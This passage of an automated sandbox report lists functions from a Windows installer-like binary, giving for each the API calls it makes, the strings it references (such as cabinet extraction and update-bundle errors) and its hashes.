Opcode ID: f00578553708577a6d8008cd96e67043c530e44997d8f678ea8082ec9f2fbde9
Instruction ID: 3fc4e809bd9f79284d6957a863b12968c1a087db52b4966cc91b7f3c6ddf0880
Opcode Fuzzy Hash: f00578553708577a6d8008cd96e67043c530e44997d8f678ea8082ec9f2fbde9
Instruction Fuzzy Hash: BB21C172910114FFCB159BA5CC09FAEBB69EF44350F2945A9E515EB071E235CE40EB50

Function 00CB5F99 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75fileCOMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 00CB5FE6
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CB6006
GetLastError.KERNEL32 ref: 00CB6010

Strings

Failed to write during cabinet extraction., xrefs: 00CB603F
Unexpected call to CabWrite()., xrefs: 00CB5FC8
cabextract.cpp, xrefs: 00CB6035

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastWrite_memcpy_s
String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
API String ID: 1970631241-3111339858
Opcode ID: 659fd8757db14e1e80fdb6e080bb083f9909bf3ef96193f0349ac67285f596fb
Instruction ID: 85b18384a1afdaf92842a219ddccaad4c34ab389dc25f207431a519dbea5dc5d
Opcode Fuzzy Hash: 659fd8757db14e1e80fdb6e080bb083f9909bf3ef96193f0349ac67285f596fb
Instruction Fuzzy Hash: D521C272600605EFCB10EB59E845EAAB7F8FF44324F14012DF615C3690D636EA019B14

Function 00CA7C57 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74COMMON

Download Yara Rule

APIs

InitializeAcl.ADVAPI32(00000000,00000008,00000002,0000001A,00000000,00000000,00000000,00000000,00000000), ref: 00CA7C95
GetLastError.KERNEL32 ref: 00CA7C9F
SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000001,20000004,00000000,00000000,00000000,00000000,00000003,000007D0,00000000,00000000,00000000,00000000), ref: 00CA7D07

Strings

cache.cpp, xrefs: 00CA7CC4
Failed to initialize ACL., xrefs: 00CA7CCE
Failed to allocate administrator SID., xrefs: 00CA7C86

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileInitializeLast
String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
API String ID: 669721577-1117388985
Opcode ID: 1ff1406abe87e16bbe64fd9170f6b4495ce14cb8cd72f59b5762e83ee6ff2450
Instruction ID: ea80b545b4bf3ff939fb6bd2ec1bf0a8a07ec5cb2a9bf25138c8470006b6d349
Opcode Fuzzy Hash: 1ff1406abe87e16bbe64fd9170f6b4495ce14cb8cd72f59b5762e83ee6ff2450
Instruction Fuzzy Hash: 38112C31E44615FADB316B94CD0AF9EB779BF41714F204626F611F6080E7704F04A750

Function 00CB5ECC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74timeCOMMON

Download Yara Rule

APIs

DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00CB5F2D
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CB5F3F
SetFileTime.KERNEL32(?,?,?,?), ref: 00CB5F52
CloseHandle.KERNEL32(?), ref: 00CB5F61

Strings

cabextract.cpp, xrefs: 00CB5EFD
Invalid operation for this state., xrefs: 00CB5F09

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: d72875c7488f649465508b00b5c92fdd4f79f84a48037c2448832bffd84b55dc
Instruction ID: 5590867426b896a8b163a780372a8884b05ac9329447da4dbea1244ca64da0fe
Opcode Fuzzy Hash: d72875c7488f649465508b00b5c92fdd4f79f84a48037c2448832bffd84b55dc
Instruction Fuzzy Hash: A8117F71200A09AE97109BE8DC8AEBBF7BCEA04711B54492AF626D20D0DB74ED06C720

Function 00C97471 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 73COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 00C9748B
GetFileAttributesW.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,?,00C98BDF,?,?,?,?,?), ref: 00C974A0
GetLastError.KERNEL32(?,00C98BDF,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00C974AB

Strings

Failed while searching directory search: %ls, for path: %ls, xrefs: 00C974E9
Failed to set variable., xrefs: 00C97511
Failed to format variable string., xrefs: 00C97496

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-402580132
Opcode ID: 1f4960fcc16c4ab0c60a67648aa52370f237dd3934a71b229e17b529108e02a7
Instruction ID: 7b7ced3333d5eadb1ec25c5e248b542e3a72b6f8b4e337ef454ad95c672db03c
Opcode Fuzzy Hash: 1f4960fcc16c4ab0c60a67648aa52370f237dd3934a71b229e17b529108e02a7
Instruction Fuzzy Hash: 88112772815115FECF206FA4CD8AEADBA65DF00350B218239F921A2052E7318F506B90

Function 00CA675C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 56COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00CA67D3

Strings

Condition, xrefs: 00CA676E
Failed to copy condition string from BSTR, xrefs: 00CA67BD
`<u, xrefs: 00CA67D3
Failed to select condition node., xrefs: 00CA678A
Failed to get Condition inner text., xrefs: 00CA67A3

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FreeString
String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
API String ID: 3341692771-266405526
Opcode ID: 8094f27855a2e943a6bd6c26a82490974154c982ac52c8b31fd43c11bcbfdaba
Instruction ID: c4676ce8b2bb232b263b80d40b36c1e69213072fb1fa711d4331c3798d918521
Opcode Fuzzy Hash: 8094f27855a2e943a6bd6c26a82490974154c982ac52c8b31fd43c11bcbfdaba
Instruction Fuzzy Hash: D211A532A14625BBDB1296A0CD45FAD76B8DB1272DF250165F801F6250E770DE40A780

Function 00C99499 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 55COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C994BE
GetTempPathW.KERNEL32(00000104,?), ref: 00C994D2
GetLastError.KERNEL32 ref: 00C994DC

Strings

Failed to set variant value., xrefs: 00C99527
variable.cpp, xrefs: 00C99501
Failed to get temp path., xrefs: 00C9950B

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastPathTemp_memset
String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
API String ID: 623060366-2915113195
Opcode ID: f91d4c27c2052f3b14a89f30dac029701ed2a958ad3f94ca5abfd2416c5e497d
Instruction ID: 603fa530c8d0b45285865ccab5c7396a95576532b7181ef7c24f37aa935e0260
Opcode Fuzzy Hash: f91d4c27c2052f3b14a89f30dac029701ed2a958ad3f94ca5abfd2416c5e497d
Instruction Fuzzy Hash: 58012B72A41329A6DB22AB689C4AFAF37989F00710F15017DFE10EB2C2DA74DE049695

Function 00CB9D95 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00CE3410,00000008,00CB9E9D,00000000,00000000,?,00CC92AC,?,?,00000000,00000000), ref: 00CB9DA6
__lock.LIBCMT ref: 00CB9DDA

Part of subcall function 00CBBE1B: __mtinitlocknum.LIBCMT ref: 00CBBE31
Part of subcall function 00CBBE1B: __amsg_exit.LIBCMT ref: 00CBBE3D
Part of subcall function 00CBBE1B: EnterCriticalSection.KERNEL32(00000000,00000000,?,00CB9DDF,0000000D,?,00CC92AC,?,?,00000000,00000000), ref: 00CBBE45

InterlockedIncrement.KERNEL32(?), ref: 00CB9DE7
__lock.LIBCMT ref: 00CB9DFB
___addlocaleref.LIBCMT ref: 00CB9E19

Strings

KERNEL32.DLL, xrefs: 00CB9DA1

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 8a3faacdccd05ab2cf65926ec15dbe3fb28b5b6f04226113deae6423769f673d
Instruction ID: 596e77f1625b7116ab1f4a639c9948e58f40dab7915f58d257b290500fa93d15
Opcode Fuzzy Hash: 8a3faacdccd05ab2cf65926ec15dbe3fb28b5b6f04226113deae6423769f673d
Instruction Fuzzy Hash: E7016D71440B80DFD7209FAAD84A78EBBF0BF50724F20491DE5D9972A1CBB4AA41EB11

Function 00CC054B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?,?,00C99175,00000000), ref: 00CC055F
GetProcAddress.KERNEL32(00000000), ref: 00CC0566
GetLastError.KERNEL32(?,?,00C99175,00000000), ref: 00CC057D

Strings

kernel32, xrefs: 00CC055A
IsWow64Process, xrefs: 00CC0550
procutil.cpp, xrefs: 00CC059F

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: IsWow64Process$kernel32$procutil.cpp
API String ID: 4275029093-1586155540
Opcode ID: 4dc9e870814a1da1c757e3e7f242753cb435b3be349838fdbe7d53270f4aee5d
Instruction ID: 1f4748584abf300a9b0ac45d2dacb845a72b10bb668cfadc9b7fa6b8cdf987a6
Opcode Fuzzy Hash: 4dc9e870814a1da1c757e3e7f242753cb435b3be349838fdbe7d53270f4aee5d
Instruction Fuzzy Hash: 95F04472A00226EB97109B95CC1AF6F7B68EF04751F15012CF915D6190E674DE00DFD4

Function 00CA2339 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 135COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00CA2351
LeaveCriticalSection.KERNEL32(?,?), ref: 00CA2498

Part of subcall function 00C9B765: _memset.LIBCMT ref: 00C9B78A

Strings

Failed to recreate command-line for update bundle., xrefs: 00CA2411
Failed to set update bundle., xrefs: 00CA2469
update\%ls, xrefs: 00CA23AC
Failed to default local update source, xrefs: 00CA23C0

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave_memset
String ID: Failed to default local update source$Failed to recreate command-line for update bundle.$Failed to set update bundle.$update\%ls
API String ID: 3751686142-1266646976
Opcode ID: 4a381672c39ef990d837b127d30a26e433a88faaa877e051a03dbb32c9c96680
Instruction ID: 714673f1d32edca214d5f0f0d8549291026b0a876ca8d2cc8ec80b700ba5383d
Opcode Fuzzy Hash: 4a381672c39ef990d837b127d30a26e433a88faaa877e051a03dbb32c9c96680
Instruction Fuzzy Hash: 0841FF3164060AEFCF22CF88CC89EAE7BBAEB4A718F208169F5145B161D375DD40EB10

Function 00CC0ED5 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 120COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000), ref: 00CC0F23
GetLastError.KERNEL32(?,?,?,00CBFD43,?,?,00000000,00000000,?,75C0B390,?,?,?,00CC0109,?,?), ref: 00CC0F29

Part of subcall function 00CC299C: GetProcessHeap.KERNEL32(00000000,?,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000), ref: 00CC29A4
Part of subcall function 00CC299C: HeapSize.KERNEL32(00000000,?,00CC0EF7,?,?,00000000,00000000,?,?,?,00CBFD43,?,?,00000000,00000000,?), ref: 00CC29AB

Strings

strutil.cpp, xrefs: 00CC0FFF
W, xrefs: 00CC0EFE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: W$strutil.cpp
API String ID: 3662877508-3697633219
Opcode ID: 6ce48e2b18d1c60610432b5e43f092a40624ac32de72297c7e51740d9360bf42
Instruction ID: 0c3721f5730d4fe3e13e8a87116339f819e3aab2d2a4190abcc3406b87476252
Opcode Fuzzy Hash: 6ce48e2b18d1c60610432b5e43f092a40624ac32de72297c7e51740d9360bf42
Instruction Fuzzy Hash: 7A413D7160024AEFDB209FE5CD81F6A77A8AF04320F30466DF925D7291D775DE81AB50

Function 00CBCC21 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00CBCC2D

Part of subcall function 00CB9EC2: __getptd_noexit.LIBCMT ref: 00CB9EC5
Part of subcall function 00CB9EC2: __amsg_exit.LIBCMT ref: 00CB9ED2

__amsg_exit.LIBCMT ref: 00CBCC4D
__lock.LIBCMT ref: 00CBCC5D
InterlockedDecrement.KERNEL32(?), ref: 00CBCC7A
_free.LIBCMT ref: 00CBCC8D
InterlockedIncrement.KERNEL32(010D2D00), ref: 00CBCCA5

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: ef0eba4974c436980c5c14916b1823d82770e528809ca6869ce73ab4ba48eead
Instruction ID: 742e1bb44acea93e6a0f97017ec845e4a9f4891eca9083995ccbd56d142288eb
Opcode Fuzzy Hash: ef0eba4974c436980c5c14916b1823d82770e528809ca6869ce73ab4ba48eead
Instruction Fuzzy Hash: 5C019231900B519BCB21ABA9D4867DD7FA0BF24760F184015E828A7290C774AE41EBD1

Function 00CADC58 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 211COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000000,?,000000FF,00000008,000000FF,00000000,00000000,00000000), ref: 00CADCBD

Strings

Failed to plan action for target product., xrefs: 00CADD0A
Failed to insert execute action., xrefs: 00CADDD8
Failed grow array of ordered patches., xrefs: 00CADE19
Failed to copy target product code., xrefs: 00CADD81

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.
API String ID: 1825529933-3432308488
Opcode ID: a221ced64e1e7f378901b8a74830847690f823021871ff65016ce27b5d32b332
Instruction ID: 5ccfceb2407f8f33a7e8baa068e317f43d646cb01ff928435f354f6294eafdcf
Opcode Fuzzy Hash: a221ced64e1e7f378901b8a74830847690f823021871ff65016ce27b5d32b332
Instruction Fuzzy Hash: 33813779A00206EFCB04CF58C584DA9B7F5FF49328B2181AAE8169B762D730EE41DF50

Function 00CA0F5D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 161synchronizationCOMMON

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(?), ref: 00CA0FB4
CloseHandle.KERNEL32(?), ref: 00CA0FBC

Strings

Unexpected elevated message sent to child process, msg: %u, xrefs: 00CA1149
elevation.cpp, xrefs: 00CA113A
Failed to save state., xrefs: 00CA1022

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandleMutexRelease
String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
API String ID: 4207627910-1576875097
Opcode ID: 476f70bda773416b5503c4a3c7c482d85b42672c055c10a7bb2b936c4ee0ca59
Instruction ID: 2f6807f801c2717efd7958d1234f4d8732f486930bef2a41ab5cd854dc714e1d
Opcode Fuzzy Hash: 476f70bda773416b5503c4a3c7c482d85b42672c055c10a7bb2b936c4ee0ca59
Instruction Fuzzy Hash: A8511A7A104601EFCB259F84CD45D1ABBB2FF09364B21C459FA5A6B272C732E921EF11

Function 00CB4324 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,?,?,?,?,?,?,00000001,00000000), ref: 00CB4357
CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF), ref: 00CB43DC

Strings

BA aborted detect forward compatible bundle., xrefs: 00CB4441
Failed to initialize update bundle., xrefs: 00CB4473
detect.cpp, xrefs: 00CB4437

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CompareString
String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$detect.cpp
API String ID: 1825529933-918857910
Opcode ID: 9680a667f6ffe3c0bc943f9199ed8a2ebfb378e7415a45c36e887f75e946de60
Instruction ID: b2e68644b4133bc068b2c1c0e6ebb39fb6f395faa2c719e31c3548df6bcc621a
Opcode Fuzzy Hash: 9680a667f6ffe3c0bc943f9199ed8a2ebfb378e7415a45c36e887f75e946de60
Instruction Fuzzy Hash: FE516D71504606FBDF299F94CC81FAEBBBAFF04310F184609F925961A2C771EA60EB51

Function 00CC60E1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32(00000003,00000001,000007D0,?,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000), ref: 00CC610E
GetLastError.KERNEL32(?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000,?,00CA786D,?,00000000,00000001,00000001), ref: 00CC611C
MoveFileExW.KERNEL32(00000003,00000001,000007D0,00000001,00000000,?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000), ref: 00CC6180
GetLastError.KERNEL32(?,?,?,00CC6208,00000003,00000001,00000001,00000000,00000000,00000000,?,00CA786D,?,00000000,00000001,00000001), ref: 00CC618A

Strings

fileutil.cpp, xrefs: 00CC61AA

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastMove
String ID: fileutil.cpp
API String ID: 55378915-2967768451
Opcode ID: 759aa420a9c2b4914a72c5553225c4c0e2bc8167735d534c3d383173d1c66f80
Instruction ID: b2e712196438d479006479af1b602c695a815ed6cc7746bccb726385e2983e01
Opcode Fuzzy Hash: 759aa420a9c2b4914a72c5553225c4c0e2bc8167735d534c3d383173d1c66f80
Instruction Fuzzy Hash: 1F210071A00226EBDF214F61CE01F7E76A8EF80B96F28003EF865E6152E734CE45D290

Function 00C960D5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86registryCOMMON

Download Yara Rule

APIs

CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,?,000000FF,00C97306,PackageVersion,?,?,00000001,00000001,00C97306,00000001,00020006,00000001), ref: 00C9614A
RegCloseKey.ADVAPI32(00C97306,00C97306,PackageVersion,?,?,00000001,00000001,00C97306,00000001,00020006,00000001,00000000), ref: 00C96160

Strings

Failed to remove update registration key: %ls, xrefs: 00C9618E
Failed to format key for update registration., xrefs: 00C96101
PackageVersion, xrefs: 00C9612C

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCompareString
String ID: Failed to format key for update registration.$Failed to remove update registration key: %ls$PackageVersion
API String ID: 446873843-3222553582
Opcode ID: cd8c96b631e661222084e5f14eecac8e3b7188144e4cd78f3c9e3f80cc88877e
Instruction ID: a46d85eb4d5a83edea370a33833a0000533c7fc6b5e309a3f11ec465147ee109
Opcode Fuzzy Hash: cd8c96b631e661222084e5f14eecac8e3b7188144e4cd78f3c9e3f80cc88877e
Instruction Fuzzy Hash: 60217F31D00218FFDF11ABE5DC4AE9EBBB9AF44710F20456AF521A11A2D7725B40EB50

Function 00C95FEC Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00CC2603: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00CA7AD4,0000001C,00000000,00000000,00000000,00000000), ref: 00CC2624

RemoveDirectoryW.KERNEL32(00000001,00000001,00000001,00000001,00000001,00C97313,?,00000001,-0000001B,00C97313,00000001,00000000,?,00C97313,00000001,00000001), ref: 00C96080

Strings

per-user, xrefs: 00C96026, 00C9602B
Failed to find local %hs appdata directory., xrefs: 00C9602C
per-machine, xrefs: 00C9601C
